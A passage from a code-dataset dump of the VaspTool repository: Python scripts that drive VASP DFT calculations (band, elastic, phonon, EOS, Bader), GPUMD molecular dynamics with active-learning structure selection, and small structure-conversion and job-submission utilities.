job_type="elastic", function="pbe",
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
elastic_job = ElasticJob(
structure=self.structure, path=path,
function="pbe",
**self.job_args, **self.incar_args
)
elastic_job.run(remove_wavecar=True)
elastic_job.post_processing(structure_info
)
return structure_info
def count_phono(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
self.incar_args["LREAL"] = False
self.incar_args["PREC"] = "Accurate"
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="phono", function="pbe",
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
phono_job = PhonopyJob(self.structure, path)
forces = []
for index, structure in enumerate(phono_job.supercell_structures):
scf_job = SCFJob(structure=structure, path=path,
job_type="phono", function="pbe", test=index + 1,
**self.job_args, **self.incar_args).run(remove_wavecar=True)
vasprun = Vasprun(scf_job.run_dir.joinpath("vasprun.xml"), parse_potcar_file=False)
forces.append(vasprun.ionic_steps[0]["forces"])
forces = np.array(forces)
phono_job.set_forces(forces)
result = phono_job.get_bandstructure(plot=True)
return structure_info
def count_scf(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
for function in self.functions:
            # SCF self-consistent calculation
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="single_point_energy", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
            # For single-point energies the functional choice is not handled further for now; if it is later, the WAVECAR handling needs attention
scf_job = SCFJob(structure=self.structure, path=path, folder="single_point_energy",
job_type="single_point_energy", function=function,
**self.job_args, **self.incar_args).run(remove_wavecar=True)
scf_job.post_processing(structure_info)
return structure_info
def count_work_function(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
for function in self.functions:
            # SCF self-consistent calculation
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="work_function", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
            # Other functionals (e.g. HSE) may follow, so the PBE run keeps its SCF WAVECAR
            if len(self.functions) != 1:
                # More than one functional was requested
if function != "pbe":
remove_wavecar = True
else:
remove_wavecar = False
else:
remove_wavecar = True
scf_job = WorkFunctionJob(structure=self.structure, path=path,
function=function,
**self.job_args, **self.incar_args).run(remove_wavecar=remove_wavecar)
scf_job.post_processing(structure_info)
return structure_info
def count_bader(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
for function in self.functions:
            # SCF self-consistent calculation
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="bader", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
scf_job = BaderJob(structure=self.structure, path=path,
function=function,
**self.job_args, **self.incar_args).run(remove_wavecar=True)
scf_job.post_processing(structure_info)
return structure_info
def count_eos(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
step = config["SETTING"].get("EOSStep")
step_num = config["SETTING"].get("EOSStepNum")
step_num += step_num % 2
for function in self.functions:
            # SCF self-consistent calculation
# self.structure.lattice.scale()
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="single_point_energy", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
start = round(-step * step_num / 2, 4)
end = round(step * step_num / 2, 4)
lattice = self.structure.lattice
matrix = lattice.matrix.copy()
lattice_map = {
0: lattice.a,
1: lattice.b,
2: lattice.c
}
logging.info(f"搜索步长:{step} 搜索数量:{step_num}。晶格常数缩放范围:{start}-{end}")
values = np.linspace(start, end, step_num + 1, dtype=float)
values = np.around(values, 4)
results = []
for value in values:
structure = self.structure.copy()
if get_vacuum_axis(structure, 10) is None:
                # Fully periodic (3D) case
for i, k in lattice_map.items():
matrix[i, :] = (matrix[i, :] / k) * (k + value)
else:
for i, k in lattice_map.items():
if i == get_vacuum_axis(structure, 10):
continue
matrix[i, :] = (matrix[i, :] / k) * (k + value)
structure.lattice = Lattice(matrix)
scf_job = SCFJob(structure=structure, path=path, folder=f"eos/cache/{value}",
job_type="single_point_energy", function=function,
**self.job_args, **self.incar_args).run(remove_wavecar=True)
result = scf_job.post_processing()
result["index"] = value
results.append(result)
results = pd.DataFrame(results)
eos = EOS(eos_name=config["SETTING"]["EOSModel"]).fit(results[f"volume_{function}"],
results[f"energy_{function}"])
eos.plot()
plt.tight_layout()
plt.savefig(path.joinpath(f"{function}/eos/eos.png"), dpi=self.job_args["dpi"])
results.to_csv(path.joinpath(f"{function}/eos/eos.csv"))
structure_info[f"e0_{function}"] = eos.e0
structure_info[f"b0_{function}"] = eos.b0
structure_info[f"b1_{function}"] = eos.b1
structure_info[f"v0_{function}"] = eos.v0
return structure_info
def cb_sr(self, structure_info, path):
self.structure: Structure = structure_info["structure"]
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="band_structure", function="pbe",
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
return structure_info
def test(self, structure_info, path):
"""
k点测试demo
通过传入KPOINTS给Job 自定义k点文件
传入全大写的字段会默认给incar 比如SIGMA=5
:param structure_info:
:param path:
:return:
"""
self.structure: Structure = structure_info["structure"]
result = []
kps = [3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
for i in kps:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="band_structure", function="pbe", test=i,
KPOINTS=Kpoints.gamma_automatic((i, i, i)), SIGMA=5,
**self.job_args, **self.incar_args).run()
final_energy = Outcar(job.run_dir.joinpath("OUTCAR")).final_fr_energy
result.append(final_energy)
plt.plot(kps, result)
plt.savefig(job.run_dir.joinpath("test_kpoints.png"), dpi=self.dpi)
return structure_info
def count_main(self, file_path: Path, calculate_type="band"):
structure_dataframe = read_dataframe_from_file(file_path)
if structure_dataframe.empty:
logging.error("计算为空,请检查输入文件")
return
logging.info(f"一共读取到{structure_dataframe.shape[0]}个文件")
structure_dataframe: pd.DataFrame
callback_function = {
"band": partial(self.count_band_structure, channl="band"),
"banddos": partial(self.count_band_structure, channl="banddos"),
"dos": partial(self.count_band_structure, channl="dos"),
# "band": self.count_band_structure,
"optic": self.count_optic,
"dielectric": self.count_dielectric,
"elastic": self.count_elastic,
"sr": self.cb_sr,
"cohp": self.count_cohp,
"test": self.test,
"aimd": self.count_aimd,
"aimd-ml": self.count_aimd,
"phono": self.count_phono,
"scf": self.count_scf,
"work_function": self.count_work_function,
"eos": self.count_eos,
"bader": self.count_bader,
}
for index, struct_info in structure_dataframe.iterrows():
try:
if struct_info.get("calculate"):
continue
path = Path(f"./cache/{struct_info['system']}{GlobSuffix}")
if calculate_type in callback_function.keys():
struct_info = callback_function[calculate_type](struct_info, path)
except KeyboardInterrupt:
return
except Exception:
                # The calculation failed
logging.error(traceback.format_exc())
with open("./err.txt", "a+", encoding="utf8") as f:
f.write(struct_info['system'] + "\n")
store_dataframe_as_json(struct_info.to_frame(), path.joinpath("result.json"))
struct_info[struct_info.index != 'structure'].to_csv(path.joinpath("result.csv"))
struct_info["calculate"] = True
for i in struct_info.index:
if i not in structure_dataframe.columns:
structure_dataframe.loc[:, i] = None
structure_dataframe.loc[index] = struct_info
if file_path.suffix == ".json":
store_dataframe_as_json(structure_dataframe, file_path.name)
else:
store_dataframe_as_json(structure_dataframe, f"./result/all_result{GlobSuffix}.json")
structure_dataframe.loc[:, structure_dataframe.columns != 'structure'].to_csv(
f"./result/result{GlobSuffix}.csv")
# break
logging.info("全部计算完成")
def build_argparse():
parser = argparse.ArgumentParser(description="""Vasp计算脚本.
如果只计算pbe的带隙:python VaspTool.py band POSCAR
如果计算hse能带:python VaspTool.py band POSCAR --function pbe hse
计算杂化泛函以pbe为基础,所以hse前要加上pbe,泛函是按顺序执行的.""", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
"calculate_type", choices=calculate_type, help=f"要计算的类型,可以自己封装下,目前有:{'、'.join(calculate_type)}"
)
parser.add_argument(
"path", type=Path, help="要计算的POSCAR路径,或者要批量计算的文件夹。"
)
parser.add_argument(
"incar_args", type=str, help="对于INCAR的补充,将使用INCAR标准字段,可以设置多个空格隔开。例如 NSW=100 ENCUT=600",
nargs="*"
)
parser.add_argument(
"-v", "--version", action="version", version=__version__
)
group_vasp = parser.add_argument_group('计算细节', '设置K点类型、泛函等。')
group_vasp.add_argument(
"-k", "--kpoints_type", type=str, help="KPOINTS取点方式:Gamma、Monkhorst。可以只写首字母",
default=setting.get("kpoints_type", "G")
)
group_vasp.add_argument(
"--function", type=str, help="要使用的泛函方法比如pbe、hse", default=["pbe"], nargs="*"
)
group_vasp.add_argument(
"-u", action='store_true', help="是否加U", default=False
)
group_vasp.add_argument(
"-soc", "--open_soc", action='store_true', help="是否打开soc", default=False
)
group_vasp.add_argument(
"--vdw", choices=list(config.get("VDW", {}).keys()), help="设置vdW 泛函", default=None
)
group_vasp.add_argument(
"--disable_sr", action='store_true', help="是否禁止优化", default=False
)
group_run = parser.add_argument_group('任务相关', '设置计算核数、vasp、mpirun环境等。')
group_run.add_argument(
"-s", "--suffix", type=str, help="给文件夹名字以及输出文件添加一个后缀", default=setting.get("suffix", "")
)
group_run.add_argument(
"-f", "--force_coverage", action='store_true', help="是否强制覆盖运行", default=False
)
group_run.add_argument(
"-n", "-c", "--core", type=int, help="要计算使用的核数,默认为计算机最大核数。。", default=os.cpu_count()
)
group_run.add_argument(
"--vasp_path", type=Path, help="vasp_std计算路径,如果设置环境变量,可以不传这个参数",
default=setting.get("vasp_path", "G")
)
group_run.add_argument(
"--mpirun_path", type=Path, help="mpirun 路径,如果设置环境变量,可以不传这个参数",
default=setting.get("mpirun_path", "G")
)
group_plot = parser.add_argument_group('画图', '画图细节设置。')
group_plot.add_argument(
"--energy_min", type=int, help="画能带图的时候y轴的下限", default=setting.get("energy_min", "G")
)
group_plot.add_argument(
"--energy_max", type=int, help="画能带图的时候y轴的上限", default=setting.get("energy_max", "G")
)
group_plot.add_argument(
"--dpi", type=int, help="保存图的清晰度", default=setting.get("dpi", "G")
)
return parser
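# Example invocation (editor's illustration, argument values are arbitrary):
#   python VaspTool.py band POSCAR NSW=100 ENCUT=600 --function pbe hse -n 64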
def parse_input_incar_value(input_values: list | None):
result = {}
if not input_values:
return result
for input_value in input_values:
values = input_value.split("=")
if len(values) != 2:
logging.warning("输入的INCAR参数必须用等号连接,不同参数间用空格,比如:NSW=50。而不是:" + input_value)
continue
key, value = values
try:
v = Incar.proc_val(key, value)
except:
logging.warning("输入的INCAR参数必须用等号连接,不同参数间用空格,比如:NSW=50。而不是:" + input_value)
continue
result[key] = v
logging.info(f"通过脚本传入的INCAR参数为:{result}")
return result
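# Example (editor's illustration): parse_input_incar_value(["NSW=100", "ENCUT=600"]) returns roughly
# {"NSW": 100, "ENCUT": 600.0}, each value being converted by Incar.proc_val.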
if __name__ == '__main__':
calculate_type = ["band", "dos", "banddos", "optic", "cohp",
"dielectric", "aimd", "aimd-ml", "phono", "elastic",
"scf", "work_function", "eos",
"bader"
]
parser = build_argparse()
args = parser.parse_args()
logging.info(f"任务使用核数:{args.core}")
if not os.path.exists("./result"):
os.mkdir("./result")
incar_args = parse_input_incar_value(args.incar_args)
if args.calculate_type == "aimd-ml":
incar_args["ML_LMLFF"] = True
incar_args["ML_MODE"] = "train"
if args.vdw:
vdw = config["VDW"][args.vdw]
for k, v in vdw.items():
incar_args[k] = v
logging.info(f"设置VDW泛函{args.vdw}参数:{vdw}")
vasp = VaspTool(vasp_path=args.vasp_path,
mpirun_path=args.mpirun_path,
force_coverage=args.force_coverage,
kpoints_type=args.kpoints_type,
cores=args.core,
functions=args.function,
dft_u=args.u,
disable_relaxation=args.disable_sr,
open_soc=args.open_soc,
incar_args=incar_args
)
if args.suffix:
        # When several nodes run in the same directory, give each job a suffix so results are not overwritten
GlobSuffix = f"-{args.suffix}"
else:
GlobSuffix = ""
vasp.set_plot_setting(vbm=args.energy_min, cbm=args.energy_max, dpi=args.dpi)
vasp.count_main(args.path, args.calculate_type)
| 102,596 | Python | .py | 2,183 | 33.347229 | 150 | 0.559233 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,157 | GpumdTool.py | aboys-cb_VaspTool/gpumd/GpumdTool.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/7/2 11:17
# @Author : 兵
# @email : [email protected]
import matplotlib
import numpy as np
from scipy.spatial.distance import cdist
matplotlib.use("Agg")
import argparse
import datetime
import glob
import logging
import os
import sys
import shutil
import subprocess
from pathlib import Path
from calorine.gpumd import *
from calorine.nep import get_descriptors
from ase.io import read as ase_read
from ase.io import write as ase_write
import matplotlib.pyplot as plt
from monty.os import cd
from sklearn.decomposition import PCA
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
stream=sys.stdout # 指定输出流为sys.stdout
)
# Sampling interval: keep one frame every NumSamples frames.
# I dump one frame every 1000 steps; a 1 ns run gives only ~100 frames, so NumSamples = 2 keeps 50 of them.
NumSamples = 2
# Farthest-point sampling copied from pynep; only this one function is used because installing pynep is inconvenient.
def select(new_data, now_data=[], min_distance=None, min_select=1, max_select=None):
"""Select those data fartheset from given data
Args:
new_data (2d list or array): A series of points to be selected
now_data (2d list or array): Points already in the dataset.
Defaults to []. (No existed data)
min_distance (float, optional):
If distance between two points exceeded the minimum distance, stop the selection.
Defaults to None (use the self.min_distance)
min_select (int, optional): Minimal numbers of points to be selected. This may cause
some distance between points less than given min_distance.
Defaults to 1.
max_select (int, optional): Maximum numbers of points to be selected.
Defaults to None. (No limitation)
Returns:
A list of int: index of selected points
"""
metric = 'euclidean'
metric_para = {}
min_distance = min_distance
max_select = max_select or len(new_data)
to_add = []
if len(new_data) == 0:
return to_add
if len(now_data) == 0:
to_add.append(0)
now_data.append(new_data[0])
distances = np.min(cdist(new_data, now_data, metric=metric, **metric_para), axis=1)
while np.max(distances) > min_distance or len(to_add) < min_select:
i = np.argmax(distances)
to_add.append(i)
if len(to_add) >= max_select:
break
distances = np.minimum(distances, cdist([new_data[i]], new_data, metric=metric)[0])
return to_add
def run(run_cmd: str, run_dir: Path):
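    """Run the gpumd executable inside run_dir, writing stdout to gpumd.out and stderr to gpumd.err."""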
start = datetime.datetime.now()
logging.info("\t开始计算")
vasp_cmd = [os.path.expanduser(os.path.expandvars(run_cmd))]
with cd(run_dir), open(f"gpumd.out", "w") as f_std, open(f"gpumd.err", "w", buffering=1) as f_err:
subprocess.check_call(vasp_cmd, stdout=f_std, stderr=f_err)
logging.info("\t计算完成" + f"\t耗时:{datetime.datetime.now() - start}")
def remove_garbage_structure(atoms_list):
    # Drop structures from runs that blew up (any interatomic distance shorter than 0.8 Å)
    result = []
    for atoms in atoms_list:
        distances = atoms.get_all_distances()
        if np.min(distances[distances > 0]) < 0.8:
continue
result.append(atoms)
return result
def verify_path(path: Path) -> None:
"""
    Check whether the path exists; if not, create it (multi-level directories are supported).
:param path:
:return:
"""
if not path.exists():
# path.mkdir()
os.makedirs(path)
def cp_file(source_file: Path, destination_dir: Path) -> None:
"""
    Copy files.
    :param source_file: the file (or glob pattern) to copy
    :param destination_dir: the directory to copy into
:return:
"""
src_files = glob.glob(source_file.as_posix())
for i in src_files:
logging.debug(f"\t复制文件:{i} -> {destination_dir.as_posix()}")
shutil.copy(i, destination_dir.as_posix())
return
def iter_path(glob_strs: list):
def decorator(func):
def wrapper(path: Path | str, *args, **kwargs):
if isinstance(path, str):
path = Path(path)
if path.is_dir():
parent = path
else:
parent = path.parent
result =[]
for glob_str in glob_strs:
for i in parent.glob(glob_str):
if path.is_file():
if i.name != path.name:
continue
try:
result.append(func(i, *args, **kwargs))
except KeyboardInterrupt:
return
except Exception as e:
logging.error(e)
pass
return result
return wrapper
return decorator
@iter_path(["*.xyz", "*.vasp"])
def molecular_dynamics(path: Path, temperature, run_time, template):
"""
    Run MD for the given file, or for every xyz/vasp file in the given directory.
    :param path:
:return:
"""
if path.suffix == ".vasp":
atoms = ase_read(path, 0, format="vasp", do_not_split_by_at_sign=True)
else:
atoms = ase_read(path, 0, format="extxyz", do_not_split_by_at_sign=True)
md_path = root_path.joinpath(f"cache/{atoms.symbols}{GlobSuffix}/{run_time}/md@{template}-{temperature}k")
shutil.rmtree(md_path, ignore_errors=True)
verify_path(md_path)
logging.info(f"路径:{md_path.as_posix()}")
new_run_in = []
run_in = read_runfile(f"./{template}")
for step in run_in:
if step[0] == "velocity":
new = ("velocity", temperature)
elif step[0] == "ensemble":
ensemble = list(step[1])
ensemble[1] = temperature
ensemble[2] = temperature
new = ("ensemble", ensemble)
elif step[0] == "run":
new = ('run', 1000 * run_time)
else:
new = step
new_run_in.append(new)
write_runfile(md_path.joinpath("run.in"), new_run_in)
cp_file(root_path.joinpath("nep.txt"), md_path.joinpath("nep.txt"))
atoms.write(md_path.joinpath("model.xyz"), format="extxyz")
run("gpumd", md_path)
data = read_thermo(md_path.joinpath("thermo.out").as_posix(), len(atoms))
potential_energy = data.potential_energy.to_numpy(dtype='float')
fig = plt.figure()
plt.plot(list(range(potential_energy.shape[0])), potential_energy)
plt.savefig(md_path.joinpath("md_energy.png"), dpi=150)
return md_path
def select_structures(train, new: Path, max_selected=20, min_distance=0.01):
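    """Select structures from an extxyz dump via farthest-point sampling on NEP descriptors.

    Crashed structures are removed first; a PCA projection of the training, MD and
    selected points is saved as select.png next to the dump file.
    """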
    # First remove structures from crashed runs
new_atoms = ase_read(new, ":", format="extxyz", do_not_split_by_at_sign=True)
new_atoms = remove_garbage_structure(new_atoms)
train_des = np.array([np.mean(get_descriptors(i, "nep.txt"), axis=0) for i in train])
new_des = np.array([np.mean(get_descriptors(i, "nep.txt"), axis=0) for i in new_atoms])
selected_i = select(np.vstack([train_des, new_des]), train_des, min_distance=min_distance, max_select=max_selected,
min_select=0)
    # Plot the descriptor projection
reducer = PCA(n_components=2)
reducer.fit(np.vstack([train_des, new_des]))
fig = plt.figure()
proj = reducer.transform(train_des)
plt.scatter(proj[:, 0], proj[:, 1], label='train', c="gray")
proj = reducer.transform(new_des)
plt.scatter(proj[:, 0], proj[:, 1], label='MD dataset', c="#07cd66")
if selected_i:
selected_proj = reducer.transform(np.array([new_des[i - train_des.shape[0]] for i in selected_i]))
plt.scatter(selected_proj[:, 0], selected_proj[:, 1], label='selected', c="red")
plt.legend()
plt.axis('off')
plt.savefig(new.with_name('select.png'))
plt.close(fig)
return [new_atoms[i - train_des.shape[0]] for i in selected_i]
def plot_all_structure(train_data, add_data, save_path):
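    """Plot a PCA projection of NEP descriptors for the training set and the newly added structures."""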
train_des = np.array([np.mean(get_descriptors(i, "nep.txt"), axis=0) for i in train_data])
add_des = np.array([np.mean(get_descriptors(i, "nep.txt"), axis=0) for i in add_data])
reducer = PCA(n_components=2)
reducer.fit(np.vstack([train_des, add_des]))
fig = plt.figure()
proj = reducer.transform(train_des)
plt.scatter(proj[:, 0], proj[:, 1], label='train', c="gray")
proj = reducer.transform(add_des)
plt.scatter(proj[:, 0], proj[:, 1], label='add', c="#07cd66")
plt.legend()
plt.axis('off')
plt.savefig(save_path)
plt.close(fig)
def auto_learn(path, run_time, temperatures, max_selected, template, min_distance):
"""
    Active-learning iteration.
    Requires an existing nep.txt, nep.in and train.xyz.
    :return:
    """
    # Sampling time per iteration, in ps
trainxyz = ase_read("train.xyz", ":", format="extxyz", do_not_split_by_at_sign=True)
# for epoch, run_time in enumerate(times):
logging.info(f"开始主动学习,采样时长:{run_time} ps。")
# 存放每次epoch 新增的训练集
new_atoms = []
# 进行gpumd采样
for temperature in temperatures:
        # Sample at each temperature
        logging.info(f"GPUMD sampling at {temperature} K for {run_time} ps")
        md_paths = molecular_dynamics(path, temperature=temperature, run_time=run_time, template=template)
        # Select structures from each MD run
for md_path in md_paths:
selected = select_structures(trainxyz + new_atoms, md_path.joinpath("dump.xyz"), max_selected=max_selected,
min_distance=min_distance)
logging.info(f"得到{len(selected)}个结构")
for i, atom in enumerate(selected):
atom.info["Config_type"] = f"{atom.symbols}-epoch-{run_time}ps-{temperature}k-{i + 1}"
new_atoms.extend(selected)
logging.info(f"本次主动学习新增了{len(new_atoms)}个结构。")
plot_all_structure(trainxyz, new_atoms, f"result/learn-epoch-{run_time}ps@{template}{GlobSuffix}.png")
ase_write(root_path.joinpath(f"result/learn-epoch-{run_time}ps@{template}{GlobSuffix}.xyz"), new_atoms,
format="extxyz")
    # Then retrain the NEP model
def prediction(path):
    # Placeholder: the prediction workflow is not implemented yet
    pass
def build_argparse():
parser = argparse.ArgumentParser(description="""GPUMD 工具.
可以批量md和主动学习 """,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
"job_type", choices=["prediction", "md", "learn"], help="任务类型"
)
parser.add_argument(
"path", type=Path, help="要计算的xyz路径,或者要批量计算的文件夹。"
)
parser.add_argument("--time", "-t", type=int, help="分子动力学的时间,单位ps。", default=10)
parser.add_argument("--temperature", "-T", type=int, help="分子动力学的温度", nargs="*", default=[300])
parser.add_argument("--template", type=str, help="模板文件的文件名", default="nvt")
parser.add_argument("--max_selected", "-max", type=int, help="每次md最多抽取的结构", default=20)
parser.add_argument("--min_distance", type=float, help="最远点采样的最小键长", default=0.01)
parser.add_argument(
"-s", "--suffix", type=str, help="给文件夹名字以及输出文件添加一个后缀", default=""
)
return parser
if __name__ == '__main__':
    # Sampling
parser = build_argparse()
args = parser.parse_args()
if not os.path.exists("./result"):
os.mkdir("./result")
root_path = Path("./")
if args.suffix:
        # When several nodes run in the same directory, give each job a suffix so results are not overwritten
GlobSuffix = f"-{args.suffix}"
else:
GlobSuffix = ""
if args.job_type == "md":
for t in args.temperature:
molecular_dynamics(args.path, temperature=t, run_time=args.time, template=args.template)
elif args.job_type == "prediction":
prediction(args.path)
elif args.job_type == "learn":
auto_learn(args.path, run_time=args.time, temperatures=args.temperature, template=args.template,
max_selected=args.max_selected, min_distance=args.min_distance)
| 12,296 | Python | .py | 281 | 33.412811 | 119 | 0.626329 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,158 | xyz2pos.py | aboys-cb_VaspTool/script/tool/xyz2pos.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/14 13:56
# @Author : 兵
# @email : [email protected]
import sys
from ase.io import read, write
pos_path = sys.argv[1]
if len(sys.argv) == 3:
index = sys.argv[2]
else:
index = -1
write("POSCAR", read(pos_path, index=index, format="extxyz"))
| 322 | Python | .py | 13 | 22.923077 | 61 | 0.638436 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,159 | select_nep.py | aboys-cb_VaspTool/script/tool/select_nep.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/15 16:33
# @Author : å…µ
# @email : [email protected]
import matplotlib.pyplot as plt
import numpy as np
import tqdm
from ase.io import read, write
from calorine.nep import get_descriptors
from pynep.select import FarthestPointSample
from sklearn.decomposition import PCA
atoms_list = read('train.xyz', ':')
print(len(atoms_list))
screen_list = []
for atoms in atoms_list:
if (np.any(abs(atoms.calc.results["forces"]) > 15)):
continue
screen_list.append(atoms)
print(len(screen_list))
des = np.array([np.mean(get_descriptors(i, "nep.txt"), axis=0) for i in screen_list])
sampler = FarthestPointSample(min_distance=0.003)
selected_i = sampler.select(des, min_select=0)
print(len(selected_i))
for i in tqdm.tqdm(selected_i):
write('selected.xyz', screen_list[i], append=True)
reducer = PCA(n_components=2)
reducer.fit(des)
proj = reducer.transform(des)
plt.scatter(proj[:, 0], proj[:, 1], label='all data')
selected_proj = reducer.transform(np.array([des[i] for i in selected_i]))
plt.scatter(selected_proj[:, 0], selected_proj[:, 1], label='selected data')
plt.legend()
plt.axis('off')
plt.savefig('select.png')
| 1,206 | Python | .py | 35 | 32.742857 | 85 | 0.724936 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,160 | shuffle.py | aboys-cb_VaspTool/script/tool/shuffle.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/7/1 20:31
# @Author : 兵
# @email : [email protected]
import sys
from ase.io import read, write
from sklearn.utils import shuffle
path = sys.argv[1]
atoms = read(path, ":", format="extxyz")
atoms = shuffle(atoms)
print("打乱成功!")
write(path, atoms, format='extxyz')
| 347 | Python | .py | 13 | 24.461538 | 40 | 0.680251 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,161 | adsorption.py | aboys-cb_VaspTool/script/tool/adsorption.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/29 19:15
# @Author : 兵
# @email : [email protected]
"""
Build adsorption structure models
"""
from pymatgen.analysis.adsorption import AdsorbateSiteFinder
from pymatgen.core import Structure, Molecule
from pymatgen.core.surface import SlabGenerator
# adsorption_molecule = Molecule("HHO",
# [[7.16750, 1.59835, 8.57334
# ],
# [5.60698, 1.60212, 8.56915],
# [6.38919, 2.17224, 8.40802]])
# Read the original bulk structure here, not a slab model
structure = Structure.from_file("./Co4.cif")
# The adsorbate molecule can be read from a file or built directly
adsorption_molecule = Molecule.from_file("H1S1O5.xyz")
slab = SlabGenerator(
structure,
    miller_index=(1, 1, 1),  # Miller index
    min_slab_size=8,  # minimum slab thickness
    min_vacuum_size=15  # vacuum layer thickness
).get_slab().make_supercell((4, 4, 1))
finder = AdsorbateSiteFinder(slab, selective_dynamics=True)
a = finder.generate_substitution_structures("NiNi")
print(a)
all = finder.generate_adsorption_structures(adsorption_molecule,
                                            (4, 4, 1),  # supercell ratio
                                            translate=True,
                                            find_args={"distance": 2.5}  # place the adsorbate 2.5 Å above the surface
)
# for i, s in enumerate(all):
# s.to(f"{i}.vasp", fmt="poscar")
| 1,517 | Python | .py | 36 | 32.166667 | 89 | 0.552184 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,162 | sub_all.py | aboys-cb_VaspTool/script/tool/sub_all.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/18 23:31
# @Author : 兵
# @email : [email protected]
import subprocess
import sys
from pathlib import Path
path = Path(sys.argv[1])
for i in path.iterdir():
_path = i.as_posix()
cmd = ["sbatch", "sub_vasp.sh", _path]
result = subprocess.run(cmd, capture_output=True, text=True, check=True)
print(result.stdout)
| 401 | Python | .py | 14 | 26.285714 | 76 | 0.65974 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,163 | supercell.py | aboys-cb_VaspTool/script/tool/supercell.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/15 19:23
# @Author : 兵
# @email : [email protected]
import os
from pymatgen.core import Structure
path = "./"
if not os.path.exists("./super"):
os.mkdir("./super")
for cif in os.listdir(path):
if os.path.isfile(cif) and cif.endswith("vasp"):
struct = Structure.from_file(cif)
supercell = struct.make_supercell([6, 12, 12])
supercell.to("./super/" + supercell.composition.to_pretty_string() + ".cif")
| 507 | Python | .py | 15 | 30.466667 | 84 | 0.638776 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,164 | bader.py | aboys-cb_VaspTool/script/tool/bader.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/10/8 22:39
# @Author : 兵
# @email : [email protected]
from pymatgen.command_line.bader_caller import bader_analysis_from_path
from pymatgen.core import Structure
def save_summary(summary):
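    """Write the Bader summary to ACF.dat: one row per site in POSCAR, plus vacuum charge/volume and the bader version."""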
with open("ACF.dat", "w", encoding="utf8") as f:
header = "Id,X,Y,Z,label,charge,transfer,min dist,atomic volume".split(",")
header = [i.center(10) for i in header]
header_text = "".join(header)
f.write(header_text)
f.write("\n")
f.write("-" * 100)
f.write("\n")
structure = Structure.from_file("POSCAR")
for index in range(len(structure)):
site = structure[index]
line = [index + 1, round(site.x, 4), round(site.y, 4), round(site.z, 4), site.label,
round(summary['charge'][index], 4),
round(summary['charge_transfer'][index], 4),
round(summary['min_dist'][index], 4),
round(summary['atomic_volume'][index], 4)]
line = [str(i).center(10) for i in line]
f.write("".join(line))
f.write("\n")
f.write("-" * 100)
f.write("\n")
f.write(f"vacuum charge : {summary['vacuum_charge']}\n")
f.write(f"vacuum volume : {summary['vacuum_volume']}\n")
f.write(f"bader version : {summary['bader_version']}\n")
if __name__ == '__main__':
print("开始bader电荷分析。")
summary = bader_analysis_from_path("./")
print("bader电荷分析完成。")
save_summary(summary)
| 1,603 | Python | .py | 37 | 33.891892 | 96 | 0.561886 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,165 | extract_xyz.py | aboys-cb_VaspTool/script/tool/extract_xyz.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/12 14:32
# @Author : 兵
# @email : [email protected]
"""
Extract structures from an xyz file at a fixed interval.
Take one structure every 50 frames:
python extract_xyz.py aimd.xyz 50
For active learning, a tag such as 100k can be appended; it is written into Config_type:
python extract_xyz.py dump.xyz 50 100k
"""
import argparse
import tqdm
from ase.io import read, write
def extract(file_path, num, config=None):
atoms_info = {}
atoms = read(file_path, index=":", format="extxyz")
extract = atoms[::num]
if config is not None:
for i, atom in tqdm.tqdm(enumerate(extract), total=len(extract)):
symbols = str(atom.symbols)
